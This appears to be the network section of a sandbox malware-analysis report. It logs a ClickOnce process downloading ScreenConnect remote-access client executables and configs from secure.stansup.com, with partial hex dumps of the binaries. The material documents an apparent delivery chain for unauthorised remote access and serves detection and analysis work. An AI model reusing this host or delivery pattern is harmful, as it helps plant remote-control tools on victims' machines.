                                                                                                                                                                                                                                                      2024-10-25 17:27:27 UTC16169INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 8c 50 0f bc 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 ba 00 00 00 0a 00 00 00 00 00 00 06 d8 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 7f 7c 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELP"0 @ |@
                                                                                                                                                                                                                                                      2024-10-25 17:27:28 UTC16384INData Raw: 00 01 00 93 0e 06 00 de 10 22 0a 06 00 60 10 22 0a 06 00 42 26 7b 0e 06 00 e9 1d 68 0e 06 00 31 0f 46 00 06 00 f3 1a 9d 0e 06 00 53 1f a1 0e 06 00 79 27 a6 0e 06 00 84 18 22 0a 36 00 6d 08 aa 0e 16 00 9b 00 af 0e 16 00 b4 00 af 0e 16 00 29 03 af 0e 36 00 6d 08 b9 0e 16 00 37 01 af 0e 06 00 bf 1c be 0e 16 00 a8 1a c3 0e 36 00 6d 08 d0 0e 16 00 25 00 d5 0e 16 00 36 19 87 0e 36 00 6d 08 e7 0e 16 00 ff 07 ec 0e 16 00 36 08 f7 0e 06 00 0f 2f 01 0f 06 00 51 20 57 0e 06 00 c6 19 06 0f 06 00 d8 19 06 0f 06 00 70 19 0b 0f 16 00 a8 1a c3 0e 36 00 6d 08 10 0f 16 00 e7 00 15 0f 16 00 46 03 1e 0f 16 00 d4 05 29 0f 16 00 c1 06 34 0f 16 00 6b 07 34 0f 16 00 73 03 49 0f 16 00 83 01 54 0f 16 00 d5 03 5f 0f 36 00 6d 08 cb 0a 16 00 be 01 c2 0a 16 00 f9 03 c2 0a 16 00 19 06
                                                                                                                                                                                                                                                      Data Ascii: "`"B&{h1FSy'"6m)6m76m%66m6/Q Wp6mF)4k4sIT_6m
                                                                                                                                                                                                                                                      2024-10-25 17:27:28 UTC16384INData Raw: 68 72 65 73 68 6f 6c 64 4c 61 62 65 6c 00 53 79 73 74 65 6d 2e 43 6f 6d 70 6f 6e 65 6e 74 4d 6f 64 65 6c 00 61 64 64 5f 4d 6f 75 73 65 57 68 65 65 6c 00 50 6f 70 75 6c 61 74 65 50 61 6e 65 6c 00 65 6d 70 74 79 52 65 73 75 6c 74 73 50 61 6e 65 6c 00 72 65 73 75 6c 74 73 50 61 6e 65 6c 00 70 61 6e 65 6c 00 53 65 6c 65 63 74 41 6c 6c 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 57 69 6e 64 6f 77 73 42 61 63 6b 73 74 61 67 65 53 68 65 6c 6c 00 73 65 74 5f 41 75 74 6f 53 63 72 6f 6c 6c 00 41 73 73 65 72 74 4e 6f 6e 4e 75 6c 6c 00 67 65 74 5f 43 6f 6e 74 72 6f 6c 00 53 63 72 6f 6c 6c 61 62 6c 65 43 6f 6e 74 72 6f 6c 00 63 6f 6e 74 72 6f 6c 00 67 65 74 5f 4c 50 61 72 61 6d 00 67 65 74 5f 57 50 61 72 61 6d 00 50 72 6f 67 72 61 6d 00 67 65 74 5f 49 74 65 6d 00 54
                                                                                                                                                                                                                                                      Data Ascii: hresholdLabelSystem.ComponentModeladd_MouseWheelPopulatePanelemptyResultsPanelresultsPanelpanelSelectAllScreenConnect.WindowsBackstageShellset_AutoScrollAssertNonNullget_ControlScrollableControlcontrolget_LParamget_WParamProgramget_ItemT
                                                                                                                                                                                                                                                      2024-10-25 17:27:28 UTC12279INData Raw: 00 6e 00 65 00 63 00 74 00 2e 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 42 00 61 00 63 00 6b 00 73 00 74 00 61 00 67 00 65 00 53 00 68 00 65 00 6c 00 6c 00 2e 00 65 00 78 00 65 00 00 00 3c 00 0e 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 4e 00 61 00 6d 00 65 00 00 00 00 00 53 00 63 00 72 00 65 00 65 00 6e 00 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 00 00 3c 00 0c 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 32 00 34 00 2e 00 32 00 2e 00 33 00 2e 00 38 00 39 00 33 00 36 00 00 00 40 00 0c 00 01 00 41 00 73 00 73 00 65 00 6d 00 62 00 6c 00 79 00 20 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 32 00 34 00 2e 00 32 00 2e 00 33 00 2e 00 38 00 39 00 33 00 36 00 00 00 30 e4 00 00 ea 01 00 00
                                                                                                                                                                                                                                                      Data Ascii: nect.WindowsBackstageShell.exe<ProductNameScreenConnect<ProductVersion24.2.3.8936@Assembly Version24.2.3.89360


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      4192.168.2.104972179.110.49.1854437740C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-10-25 17:27:29 UTC138OUTGET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1
                                                                                                                                                                                                                                                      Host: secure.stansup.com
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      2024-10-25 17:27:29 UTC213INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Cache-Control: private
                                                                                                                                                                                                                                                      Content-Length: 266
                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                      Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                      Date: Fri, 25 Oct 2024 17:27:29 GMT
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-10-25 17:27:29 UTC266INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      5192.168.2.104972279.110.49.1854437740C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-10-25 17:27:30 UTC109OUTGET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1
                                                                                                                                                                                                                                                      Host: secure.stansup.com
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      2024-10-25 17:27:30 UTC213INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Cache-Control: private
                                                                                                                                                                                                                                                      Content-Length: 266
                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                      Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                      Date: Fri, 25 Oct 2024 17:27:30 GMT
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-10-25 17:27:30 UTC266INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      6192.168.2.104972479.110.49.1854437740C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-10-25 17:27:31 UTC141OUTGET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1
                                                                                                                                                                                                                                                      Host: secure.stansup.com
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      2024-10-25 17:27:31 UTC213INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Cache-Control: private
                                                                                                                                                                                                                                                      Content-Length: 266
                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                      Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                      Date: Fri, 25 Oct 2024 17:27:31 GMT
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-10-25 17:27:31 UTC266INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      7192.168.2.104972579.110.49.1854437740C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-10-25 17:27:32 UTC131OUTGET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1
                                                                                                                                                                                                                                                      Host: secure.stansup.com
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      2024-10-25 17:27:33 UTC215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Cache-Control: private
                                                                                                                                                                                                                                                      Content-Length: 81696
                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                      Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                      Date: Fri, 25 Oct 2024 17:27:32 GMT
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-10-25 17:27:33 UTC16169INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7a 9c 58 f1 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 40 00 00 00 d4 00 00 00 00 00 00 e6 5e 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 01 00 00 02 00 00 96 ab 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELzX"0@^ `@ `@
                                                                                                                                                                                                                                                      2024-10-25 17:27:33 UTC16384INData Raw: 34 35 32 62 2d 38 39 37 35 2d 37 34 61 38 35 38 32 38 64 33 35 34 00 00 13 01 00 02 00 00 00 04 54 65 78 74 05 53 74 61 74 65 00 00 08 01 00 0b 00 00 00 00 00 00 00 3c 7d b5 15 e6 e4 47 39 a8 2f df 51 21 71 d1 7d 7c b4 23 ff 20 aa 00 bc c6 ea 30 f6 ac ab 55 7c cb 13 b1 66 bd 7a 69 bd d1 74 04 f3 9e 32 ae b2 e1 88 de 6c a2 e7 df 05 2c 86 6e 6d 86 5d ac ab b4 f5 fc e8 bf af d9 ab 77 e1 9c 9d 9d 47 f8 bc 1f 97 32 ee 22 45 7e 53 a9 85 d4 74 40 81 47 46 8a 90 dd d2 c3 e6 60 69 82 ec 5a 08 9c b2 91 6b 34 e0 d0 8f ba 84 fe 4b 55 db 67 ae 56 73 fe 12 00 00 00 00 81 c5 e8 85 00 00 00 00 02 00 00 00 7b 00 00 00 18 5e 00 00 18 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 52 53 44 53 cb 4c a1 5b 4d 39 69 48 9a 46 34 07
                                                                                                                                                                                                                                                      Data Ascii: 452b-8975-74a85828d354TextState<}G9/Q!q}|# 0U|fzit2l,nm]wG2"E~St@GF`iZk4KUgVs{^@RSDSL[M9iHF4
                                                                                                                                                                                                                                                      2024-10-25 17:27:33 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 d2 ff ff 55 d1 fe ff 54 d0 fd ff 53 cf fb ff 52 cc f8 ff 51 c9 f4 ff 50 c6 f0 ff 4e c2 eb ff 4c bc e5 ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff 4c bc e5 ff 4e c2 eb ff 50 c6 f0 ff 51 c9 f4 ff 52 cc f8 ff 53 ce fa ff 54 d0 fd ff 55 d1 fe ff 55 d2 ff ff
                                                                                                                                                                                                                                                      Data Ascii: UUTSRQPNL::::::::::::::::::::::::::::::::::::::LNPQRSTUU
                                                                                                                                                                                                                                                      2024-10-25 17:27:33 UTC16384INData Raw: d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 00 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: ffffffffffffffgggggggggggggggggggggggggggggggggggggggggg
                                                                                                                                                                                                                                                      2024-10-25 17:27:33 UTC16375INData Raw: 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 6e cd f3 ff 85 e0 ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 9a e5 ff ef 00 00 00 00 00 00 00 00 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 cf 00 9f e0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9f e0 ef 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 cf 00 9f e0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: n


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      8192.168.2.104972679.110.49.1854437740C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-10-25 17:27:34 UTC119OUTGET /Bin/ScreenConnect.Client.dll HTTP/1.1
                                                                                                                                                                                                                                                      Host: secure.stansup.com
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      2024-10-25 17:27:34 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Cache-Control: private
                                                                                                                                                                                                                                                      Content-Length: 197120
                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                      Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                      Date: Fri, 25 Oct 2024 17:27:34 GMT
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-10-25 17:27:34 UTC16168INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 1e 35 ea eb 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 fa 02 00 00 06 00 00 00 00 00 00 82 18 03 00 00 20 00 00 00 20 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 03 00 00 02 00 00 5d ca 03 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL5" 0 `]@
                                                                                                                                                                                                                                                      2024-10-25 17:27:34 UTC16384INData Raw: 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 f6 02 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 f8 02 00 06 16 fe 01 2a 26 0f 00 03 28 fb 02 00 06 2a 0a 16 2a 5e 03 75 77 00 00 02 2c 0d 02 03 a5 77 00 00 02 28 fb 02 00 06 2a 16 2a 0a 17 2a 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06 72 c3 0f 00 70 6f 76 00 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 fd 02 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 ff 02 00 06 16 fe 01 2a 26 0f 00 03 28 02 03 00 06 2a 0a 16 2a 5e 03 75 78 00 00 02 2c 0d 02 03 a5 78 00 00 02 28 02 03 00 06 2a 16 2a 0a 17 2a 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06
                                                                                                                                                                                                                                                      Data Ascii: &rYpov&(, ow&}ow&o)**.(*&(**^uw,w(***0@surpov&rYpov&(, ow&}ow&o)**.(*&(**^ux,x(***0@su
                                                                                                                                                                                                                                                      2024-10-25 17:27:34 UTC16384INData Raw: 02 7e 2c 02 00 0a 7d 06 01 00 04 02 15 7d 07 01 00 04 02 28 ef 00 00 0a 6f 2f 02 00 0a 7d 04 01 00 04 02 7b 04 01 00 04 03 06 7b 6b 01 00 04 6f 30 02 00 0a 06 7b 6b 01 00 04 6f 31 02 00 0a 6f 32 02 00 0a 02 7b 04 01 00 04 05 0e 04 6f 33 02 00 0a 02 7b 04 01 00 04 16 16 06 7b 6b 01 00 04 6f 30 02 00 0a 06 7b 6b 01 00 04 6f 31 02 00 0a 73 95 01 00 0a 06 fe 06 b5 04 00 06 73 34 02 00 0a 28 35 02 00 0a de 10 26 02 28 14 04 00 06 fe 1a 07 28 bd 00 00 0a dc 2a 00 00 00 01 1c 00 00 00 00 66 00 76 dc 00 09 16 00 00 01 02 00 1a 00 cb e5 00 07 00 00 00 00 1b 30 03 00 42 00 00 00 25 00 00 11 02 7b 03 01 00 04 0a 06 28 b8 00 00 0a 02 28 15 04 00 06 72 cb 17 00 70 18 28 36 02 00 0a 26 02 17 28 1e 04 00 06 de 19 02 7b 04 01 00 04 6f 37 02 00 0a 02 28 14 04 00 06 dc 06
                                                                                                                                                                                                                                                      Data Ascii: ~,}}(o/}{{ko0{ko1o2{o3{{ko0{ko1ss4(5&((*fv0B%{((rp(6&({o7(
                                                                                                                                                                                                                                                      2024-10-25 17:27:35 UTC16384INData Raw: 47 1f 16 00 f6 03 58 1f 16 00 30 07 69 1f 16 00 ab 08 47 1f 16 00 30 04 71 1f 16 00 4d 07 7b 1f 16 00 01 00 85 1f 16 00 3b 03 85 1f 06 00 ce 72 8e 1f 06 00 69 5c 9d 1d 06 00 ce 72 8e 1f 06 00 a5 75 8e 1d 01 00 e3 74 93 1f 01 00 e5 59 a9 10 01 00 50 37 99 1f 36 00 56 0a 9e 1f 16 00 8a 02 a3 1f 36 00 56 0a af 1f 16 00 a0 00 a3 1f 36 00 56 0a e6 11 16 00 70 00 dc 11 16 00 94 03 52 12 06 00 12 81 64 07 06 00 06 63 b4 11 06 00 7b 6d 0f 11 06 00 ce 72 b9 11 06 00 71 32 c6 11 06 00 9c 79 cb 11 06 00 90 83 a6 10 06 00 a9 62 2c 13 06 00 ce 72 b9 11 06 00 19 0d 58 04 06 00 26 77 b4 1f 06 00 ce 72 b9 1f 06 00 ac 65 7a 1e 06 00 7d 5d cb 11 36 00 56 0a be 1f 16 00 6c 01 c3 1f 06 00 ce 72 d5 1f 06 00 12 81 2a 1f 06 00 1a 63 da 1f 06 00 e4 7d 74 1d 06 00 79 59 ec 1f 06
                                                                                                                                                                                                                                                      Data Ascii: GX0iG0qM{;ri\rutYP76V6V6VpRdc{mrq2yb,rX&wrez}]6Vlr*c}tyY
                                                                                                                                                                                                                                                      2024-10-25 17:27:35 UTC16384INData Raw: 00 00 00 00 c4 01 1e 2a ce 2b e8 03 8c b2 00 00 00 00 94 00 7b 3e d8 2b e9 03 00 00 00 00 00 00 c4 05 42 64 e2 2b ea 03 2f b3 00 00 00 00 81 00 bc 71 e2 2b eb 03 50 b3 00 00 00 00 c4 00 58 10 d1 21 ec 03 a0 b9 00 00 00 00 81 00 81 2a e9 2b ed 03 08 ba 00 00 00 00 91 00 00 0f f8 2b f0 03 a0 ba 00 00 00 00 81 00 6a 09 08 2c f4 03 c0 ba 00 00 00 00 91 18 97 66 aa 20 f5 03 cc ba 00 00 00 00 86 18 91 66 01 00 f5 03 d4 ba 00 00 00 00 83 00 87 01 0f 2c f5 03 f3 ba 00 00 00 00 91 18 97 66 aa 20 f6 03 ff ba 00 00 00 00 86 18 91 66 01 00 f6 03 07 bb 00 00 00 00 83 00 3a 00 20 2c f6 03 0f bb 00 00 00 00 83 00 74 03 27 2c f7 03 17 bb 00 00 00 00 83 00 a3 01 78 29 f8 03 2a bb 00 00 00 00 86 18 91 66 01 00 f9 03 32 bb 00 00 00 00 83 00 b9 02 76 07 f9 03 56 bb 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: *+{>+Bd+/q+PX!*++j,f f,f f: ,t',x)*f2vV
